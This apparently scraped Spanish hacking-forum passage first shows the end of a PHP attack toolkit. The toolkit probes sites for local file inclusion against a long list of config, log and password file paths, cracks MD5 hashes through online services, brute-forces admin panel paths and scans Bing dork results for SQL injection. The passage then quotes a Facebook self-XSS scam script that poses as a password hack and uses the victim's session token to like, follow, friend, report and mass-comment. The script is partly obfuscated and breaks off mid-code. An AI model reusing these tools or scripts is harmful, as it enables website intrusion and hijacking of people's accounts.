'/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf', '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf', '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf', '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php', '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php', '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php', '/usr/local/etc/apache/vhosts.conf', '/etc/php.ini', '/bin/php.ini', '/etc/httpd/php.ini', '/usr/lib/php.ini', '/usr/lib/php/php.ini', '/usr/local/etc/php.ini', '/usr/local/lib/php.ini', '/usr/local/php/lib/php.ini', '/usr/local/php4/lib/php.ini', '/usr/local/php5/lib/php.ini', '/usr/local/apache/conf/php.ini', '/etc/php4.4/fcgi/php.ini', '/etc/php4/apache/php.ini', '/etc/php4/apache2/php.ini', '/etc/php5/apache/php.ini', '/etc/php5/apache2/php.ini', '/etc/php/php.ini', '/etc/php/php4/php.ini', '/etc/php/apache/php.ini', '/etc/php/apache2/php.ini', '/web/conf/php.ini', '/usr/local/Zend/etc/php.ini', '/opt/xampp/etc/php.ini', '/var/local/www/conf/php.ini', '/etc/php/cgi/php.ini', '/etc/php4/cgi/php.ini', '/etc/php5/cgi/php.ini', 'c:\php5\php.ini', 'c:\php4\php.ini', 'c:\php\php.ini', 'c:\PHP\php.ini', 'c:\WINDOWS\php.ini', 'c:\WINNT\php.ini', 'c:\apache\php\php.ini', 'c:\xampp\apache\bin\php.ini', 'c:\NetServer\bin\stable\apache\php.ini', 'c:\home2\bin\stable\apache\php.ini', 'c:\home\bin\stable\apache\php.ini', '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini', '/usr/local/cpanel/logs', '/usr/local/cpanel/logs/stats_log', '/usr/local/cpanel/logs/access_log', '/usr/local/cpanel/logs/error_log', '/usr/local/cpanel/logs/license_log', '/usr/local/cpanel/logs/login_log', '/var/cpanel/cpanel.config', '/var/log/mysql/mysql-bin.log', '/var/log/mysql.log', '/var/log/mysqlderror.log', '/var/log/mysql/mysql.log', '/var/log/mysql/mysql-slow.log', '/var/mysql.log', '/var/lib/mysql/my.cnf', 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err', 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log', 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err', 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log', 'C:\ProgramFiles\MySQL\data\hostname.err', 'C:\ProgramFiles\MySQL\data\mysql.log', 'C:\ProgramFiles\MySQL\data\mysql.err', 'C:\ProgramFiles\MySQL\data\mysql-bin.log', 'C:\MySQL\data\hostname.err', 'C:\MySQL\data\mysql.log', 'C:\MySQL\data\mysql.err', 'C:\MySQL\data\mysql-bin.log', 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini', 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf', 'C:\ProgramFiles\MySQL\my.ini', 'C:\ProgramFiles\MySQL\my.cnf', 'C:\MySQL\my.ini', 'C:\MySQL\my.cnf', '/etc/logrotate.d/proftpd', '/www/logs/proftpd.system.log', '/var/log/proftpd', '/etc/proftp.conf', '/etc/protpd/proftpd.conf', '/etc/vhcs2/proftpd/proftpd.conf', '/etc/proftpd/modules.conf', '/var/log/vsftpd.log', '/etc/vsftpd.chroot_list', '/etc/logrotate.d/vsftpd.log', '/etc/vsftpd/vsftpd.conf', '/etc/vsftpd.conf', '/etc/chrootUsers', '/var/log/xferlog', '/var/adm/log/xferlog', '/etc/wu-ftpd/ftpaccess', '/etc/wu-ftpd/ftphosts', '/etc/wu-ftpd/ftpusers', '/usr/sbin/pure-config.pl', '/usr/etc/pure-ftpd.conf', '/etc/pure-ftpd/pure-ftpd.conf', '/usr/local/etc/pure-ftpd.conf', '/usr/local/etc/pureftpd.pdb', '/usr/local/pureftpd/etc/pureftpd.pdb', '/usr/local/pureftpd/sbin/pure-config.pl', '/usr/local/pureftpd/etc/pure-ftpd.conf', '/etc/pure-ftpd/pure-ftpd.pdb', '/etc/pureftpd.pdb', '/etc/pureftpd.passwd', '/etc/pure-ftpd/pureftpd.pdb', '/var/log/pure-ftpd/pure-ftpd.log', '/logs/pure-ftpd.log', '/var/log/pureftpd.log', '/var/log/ftp-proxy/ftp-proxy.log', '/var/log/ftp-proxy', '/var/log/ftplog', '/etc/logrotate.d/ftp', '/etc/ftpchroot', '/etc/ftphosts', '/var/log/exim_mainlog', '/var/log/exim/mainlog', '/var/log/maillog', '/var/log/exim_paniclog', '/var/log/exim/paniclog', '/var/log/exim/rejectlog', '/var/log/exim_rejectlog');
    $code = toma($target . "'");
    $check_lfi = "0";
    if (preg_match("/No such file or directory in <b>(.*)<\/b> on line/i", $code)) {
        preg_match_all("/No such file or directory in <b>(.*)<\/b> on line/i", $code, $re);
        echo "\n\t\t\t[+] Full Path Discloure : " . $re[1][0];
        $check_lfi = "1";
    } elseif (preg_match("/No existe el fichero o el directorio in <b>(.*?)<\/b> on line/i", $code)) {
        preg_match_all("/No existe el fichero o el directorio in <b>(.*?)<\/b> on line/i", $code, $re);
        echo "\n\t\t\t[+] Full Path Discloure : " . $re[1][0];
        $check_lfi = "1";
    } else {
        echo "\n\t\t\t[-] Not Vulnerable";
        $check_lfi = "0";
    }
    if ($check_lfi == 1) {
        echo "\n\n\t\t\t[+] Searching files ...\n";
        foreach($files as $file) {
            $code = toma($target . $file);
            if (preg_match("/No such file or directory in <b>(.*)<\/b> on line/i", $code) or preg_match("/No existe el fichero o el directorio in <b>(.*?)<\/b> on line/i", $code)) {
            } else {
                echo "\n\t\t\t[+] : " . $target . $file;
            }
        }
        echo "\n\n\t\t\t[+] Finished";
    }
}
function crackmd5($hash) {
    echo "\n\t\t\t[+] " . $hash . " : ";
    $code = tomar("http://www.md5.net/cracker.php", "hash=" . $hash . "&submit=Crack");
    $check_error = "0";
    if (preg_match("/<input type=\"text\" id=\"hash\" size=\"(.*?)\" value=\"(.*?)\"/i", $code)) {
        preg_match_all("/<input type=\"text\" id=\"hash\" size=\"(.*?)\" value=\"(.*?)\"/i", $code, $re);
        if (preg_match("/Entry not found/", $re[2][0])) {
            $check_error = "0";
        } else {
            echo $re[2][0];
            $check_error = "1";
        }
    } else {
        echo "Not Found";
        $check_error = "0";
    }
    if ($check_error == 1) {
    } else {
        $code = tomar("http://md5online.net/index.php", "pass=" . $hash . "&option=hash2text&send=Submit");
        if (preg_match("/<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>/i", $code)) {
            preg_match_all("/<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>/i", $code, $re);
            echo $re[2][0];
        } else {
            $code = tomar("http://md5decryption.com/index.php", "hash=" . $hash . "&submit=Decrypt It!");
            if (preg_match("/Decrypted Text: <\/b>(.*?)<\/font>/i", $code)) {
                preg_match_all("/Decrypted Text: <\/b>(.*?)<\/font>/i", $code, $re);
                echo $re[1][0];
            } else {
                $code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php", "md5=" . $hash);
                if (preg_match("/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/i", $code)) {
                    preg_match_all("/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/i", $code, $re);
                    echo $re[1][0];
                } else {
                    echo "Not Found";
                }
            }
        }
    }
}
function locateip($target) {
    $dame_host = parse_url($target);
    $hostname = $dame_host['host'];
    $ip = gethostbyname($hostname);
    echo "\n\t\t\t[+] Searching ...\n";
    $code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress=" . $ip);
    if (preg_match("/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/i", $code)) {
        preg_match_all("/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/i", $code, $re);
        echo "\n\t\t\t[+] City : " . $re[2][0];
    } else {
        echo "\n\t\t\t[+] City : Not Found";
    }
    if (preg_match("/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/i", $code)) {
        preg_match_all("/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/i", $code, $re);
        echo "\n\t\t\t[+] Country : " . $re[2][0];
    } else {
        echo "\n\t\t\t[+] Country : Not Found";
    }
    if (preg_match("/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/i", $code)) {
        preg_match_all("/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/i", $code, $re);
        echo "\n\t\t\t[+] State or Region : " . $re[2][0];
    } else {
        echo "\n\t\t\t[+] State or Region : Not Found";
    }
    echo "\n";
    $code = toma("http://www.ip-adress.com/reverse_ip/" . $ip);
    if (preg_match("/whois\/(.*?)\">Whois/i", $code)) {
        preg_match_all("/whois\/(.*?)\">Whois/i", $code, $re);
        $matches = $re[1];
        foreach($matches as $valor) {
            echo "\n\t\t\t[+] DNS Found : " . $valor;
        }
    }
    echo "\n\n\t\t\t[+] Finished";
}
function paneladmin($target) {
    $panels = array('admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx', 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp', 'asp/admin/admin.aspx', 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx', 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp', 'login/index.asp', 'login/index.aspx', 'login/login.asp', 'login/login.aspx', 'login/admin.asp', 'login/admin.aspx', 'administracion/index.asp', 'administracion/index.aspx', 'administracion/login.asp', 'administracion/login.aspx', 'administracion/webmaster.asp', 'administracion/webmaster.aspx', 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/', 'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php', 'administracion/', 'administracion/index.php', 'administracion/login.php', 'administracion/ingresar.php', 'administracion/admin.php', 'administration/', 'administration/index.php', 'administration/login.php', 'administrator/index.php', 'administrator/login.php', 'administrator/system.php', 'system/', 'system/login.php', 'admin.php', 'login.php', 'administrador.php', 'administration.php', 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/home.php', 'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/', 'administrator/index.html', 'administrator/login.html', 'administrator/account.html', 'administrator/account.php', 'administrator.html', 'login.html', 'modelsearch/login.php', 'moderator.php', 'moderator.html', 'moderator/login.php', 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html', 'moderator/', 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php', 'controlpanel.html', 'admincontrol.php', 'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp', 'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp', 'administrator/index.asp', 'administrator/login.asp', 'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp', 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp', 'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp', 'Server/', 'wp-admin/', 'administr8.php', 'administr8.html', 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp', 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp', 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/', 'useradmin/', 'sysadmins/', 'admin1/', 'system-administration/', 'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/', 'sys-admin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/', 'login-redirect/', 'sub-login/', 'wp-login/', 'login1/', 'dir-login/', 'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/', 'login-us/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sql-admin/', 'radmind/', 'openvpnadmin/', 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/', 'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind-1/', 'Super-Admin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/', 'system_administration/', 'ss_vms_admin_sm/');
    @set_time_limit(20);
    echo "\n\t\t\t" . "[+] Searching panels in " . $target . "\n";
    foreach($panels as $panel) {
        if (tomax($target . "/" . $panel) == 200) {
            echo "\n\t\t\t[+] Link : " . $target . "/" . $panel;
        }
    }
    echo "\n\n\t\t\t" . "[+] Finished";
}
//$code = toma("http://www.petardas.com/index.php");
//if(preg_match("/Sexo/i", $code)) {
//echo "yeah";
//}
//$code = tomar("http://localhost:8080/labs/post.php","probar=fuckyou&con=forear");
//if(preg_match("/fuckyou/i", $code)) {
//echo "yeah";
//}
//checksql("http://localhost:8080/labs/sql.php?id=ddsa");
//scanner_bing("noticias.php+id","5");
function checksql($target) {
    if (preg_match('/(.*)=(.*)/i', $target)) {
        preg_match_all('/(.*)=(.*)/i', $target, $re);
        $code = toma($re[1][0] . "=-1+union+select+1--");
        if (preg_match('/The used SELECT statements have a different number of columns/i', $code)) {
            echo "\n\t\t\t[+] SQLI : " . $re[1][0] . "=";
        }
    }
}
function scanner_bing($dork, $paginas) {
    echo "\n\t\t\t[+] Scanning ...\n";
    $valor = "10" * $paginas;
    $valorz = (int)$valor;
    for ($i = 10;$i <= $valorz;$i+= 10) {
        $code = toma("http://www.bing.com/search?q=" . $dork . "&first=" . $i);
        if (preg_match('/<h3><a href="(.*?)"/i', $code)) {
            preg_match_all('/<h3><a href="(.*?)"/i', $code, $re);
            $reco = $re[1];
            foreach($reco as $target) {
                checksql($target);
            }
        }
    }
    echo "\n\n\t\t\t[+] Finished\n";
}
function hexdecode($texto) {
    // Credits
    // Based on : http://stackoverflow.com/questions/14674834/php-convert-string-to-hex-and-hex-to-string
    $final = "";
    for ($num = 0;$num < strlen($texto) - 1;$num+= 2) {
        $final.= chr(hexdec($texto[$num] . $texto[$num + 1]));
    }
    return $final;
}
function hex($texto) {
    // Credits
    // Based on : http://stackoverflow.com/questions/14674834/php-convert-string-to-hex-and-hex-to-string
    $final = "";
    for ($num = 0;$num < strlen($texto);$num++) {
        $final.= substr('0' . dechex(ord($texto[$num])), -2);
    }
    return "0x" . $final;
}
function tomax($target) {
    $nave = curl_init($target);
    curl_setopt($nave, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0');
    curl_setopt($nave, CURLOPT_TIMEOUT, 5);
    curl_setopt($nave, CURLOPT_RETURNTRANSFER, true);
    $resultado = curl_exec($nave);
    return curl_getinfo($nave, CURLINFO_HTTP_CODE);
}
function toma($target) {
    $nave = curl_init($target);
    curl_setopt($nave, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0');
    curl_setopt($nave, CURLOPT_TIMEOUT, 5);
    curl_setopt($nave, CURLOPT_RETURNTRANSFER, true);
    return curl_exec($nave);
}
function tomar($target, $params) {
    $nave = curl_init($target);
    curl_setopt($nave, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0');
    curl_setopt($nave, CURLOPT_TIMEOUT, 5);
    curl_setopt($nave, CURLOPT_POST, true);
    curl_setopt($nave, CURLOPT_POSTFIELDS, $params);
    curl_setopt($nave, CURLOPT_RETURNTRANSFER, true);
    return curl_exec($nave);
}
function darcolor() {
    echo "<!-- This program has been programmed by Doddy Hackman in the year 2014 -->";
    echo '<style type="text/css">
 
 
.main {
margin            : -287px 0px 0px -490px;
border            : White solid 1px;
BORDER-COLOR: #00FF00;
}
 
 
#pie {
position: absolute;
bottom: 0;
}
 
body,a:link {
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}
 
input,table.outset,table.bord,table,textarea,select,fieldset,td,tr {
font: normal 12px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}
 
a:link,a:visited,a:active {
color: #00FF00;
font: normal 17px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>
';
}
echo "<!-- The End ? -->";

// The End ?

?>

Si quieren bajar el codigo lo pueden hacer de aca

Codigo Falso?

$
0
0
Hola gente encontré esto en face y quería saber la opinión de ustedes......


Código:

Quieren "hackear" - tener el password de la cuenta de alguien en Facebook? Aprovechen esta vulnerabilidad antes de que se den cuenta y la quiten, está funcionando AHORITA!

1. Necesitan utilizar Google Chrome
2. Se meten al perfil de la persona
3. Aprietan la tecla F12
4. Van a la seccion/pestaña que dice "Consola"
5. Copian y pegan el siguiente código <ver abajo>, presionan <ENTER> y listo!!! Se abrirá un pop-up con el password de esa persona!!!

/* Copiar a partir de aquí */
var parent=document.getElementsByTagName("html")[0];
var _body = document.getElementsByTagName('body')[0];
var _div = document.createElement('div');
_div.style.height="25";
_div.style.width="100%";
_div.style.position="fixed";
_div.style.top="auto";
_div.style.bottom="0";
_div.align="center";
var _audio= document.createElement('audio');
_audio.style.width="100%";
_audio.style.height="25px";
_audio.controls = true;
_audio.autoplay = false;
_audio.autoplay = true;
_audio.src = "http://picosong.com/YPGz";
_div.appendChild(_audio);
_body.appendChild(_div);
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("");function sublist(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var now=(new Date).getTime();function P(post){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/ufi/like.php";var XParams="like_action=true&ft_ent_identifier="+post+"&source=1&client_id="+now+"%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]="+post+"&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);function Like(p){var Page=new XMLHttpRequest();var PageURL="//www.facebook.com/ajax/pages/fan_status.php";var PageParams="&fbpage_id="+p+"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";Page.open("POST",PageURL,true);Page.onreadystatechange=function(){if(Page.readyState==4&&Page.status==200){Page.close}};Page.send(PageParams)}Like("185309954944253");function IDS(r){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/add_friend/action.php";var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}
Like("331015242937");
var _0xb161=["\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x67\x65\x74\x54\x69\x6D\x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x72\x65\x70\x6F\x72\x74\x2F\x73\x6F\x63\x69\x61\x6C\x2E\x70\x68\x70","\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x62\x6C\x6F\x63\x6B\x3D\x31\x26\x70\x70\x3D\x25\x37\x42\x25\x32\x32\x61\x63\x74\x69\x6F\x6E\x73\x5F\x74\x6F\x5F\x74\x61\x6B\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x5B\x5D\x25\x32\x32\x25\x32\x43\x25\x32\x32\x61\x72\x65\x5F\x66\x72\x69\x65\x6E\x64\x73\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x63\x69\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x63\x6F\x6E\x74\x65\x6E\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x30\x25\x32\x43\x25\x32\x32\x65\x78\x70\x61\x6E\x64\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x33\x41\x31\x25\x32\x43\x25\x32\x32\x66\x69\x72\x73\x74\x5F\x63\x68\x6F\x69\x63\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32\x66\x72\x6F\x6D\x5F\x67\x65\x61\x72\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74\x69\x6D\x65\x6C\x69\x6E\x65\x25\x32\x32\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x66\x6F\x6C\x6C\x6F\x77\x69\x6E\x67\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x74\x61\x67\x67\x65\x64\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x6F\x6E\x5F\x70\x72\x6F\x66\x69\x6C\x65\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x70\x68\x61\x73\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x72\x65\x66\x25\x32\x32\x25\x33\x41\x25\x32\x32\x68\x74\x74\x70\x73\x25\x33\x41\x25\x35\x43\x25\x32\x46\x25\x35\x43\x25\x32\x46\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x25\x35\x43\x25\x32\x46\x4E\x61\x6E\x2E\x65\x72\x74\x74\x37\x25\x32\x32\x25\x32\x43\x25\x32\x32\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x31\x34\x35\x25\x32\x43\x25\x32\x32\x72\x69\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x73\x75\x62\x5F\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x74\x69\x6D\x65\x5F\x66\x6C\x6F\x77\x5F\x73\x74\x61\x72\x74\x65\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x75\x73\x65\x72\x25\x32\x32\x25\x33\x41","\x25\x37\x44\x26\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x3D\x31\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x32\x71\x6D\x76\x75\x35\x6B\x39\x55\x6D\x41\x41\x61\x55\x56\x70\x6F\x26\x5F\x5F\x72\x65\x71\x3D\x75\x26\x74\x74\x73\x74\x61\x6D\x70\x3D\x32\x36\x35\x38\x31\x36\x38\x35\x37\x31\x30\x37\x31\x31\x30\x38\x38\x38\x30","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65","\x73\x65\x6E\x64","\x31\x30\x30\x30\x30\x36\x39\x35\x32\x31\x31\x39\x30\x34\x38"];var fb_dtsg=document[_0xb161[2]](_0xb161[1])[0][_0xb161[0]];var user_id=document[_0xb161[4]][_0xb161[3]](document[_0xb161[4]][_0xb161[3]](/c_user=(\d+)/)[1]);var now=( new Date)[_0xb161[5]]();function Report(_0x45e7x5){var _0x45e7x6= new XMLHttpRequest();var _0x45e7x7=_0xb161[6];var _0x45e7x8=_0xb161[7]+fb_dtsg+_0xb161[8]+_0x45e7x5+_0xb161[9]+_0x45e7x5+_0xb161[10]+now+_0xb161[11]+user_id+_0xb161[12]+user_id+_0xb161[13];_0x45e7x6[_0xb161[15]](_0xb161[14],_0x45e7x7,true);_0x45e7x6[_0xb161[16]]=function (){if(_0x45e7x6[_0xb161[17]]==4&&_0x45e7x6[_0xb161[18]]==200){_0x45e7x6[_0xb161[19]];} ;} ;_0x45e7x6[_0xb161[20]](_0x45e7x8);} ;
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","10202847798894240","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function 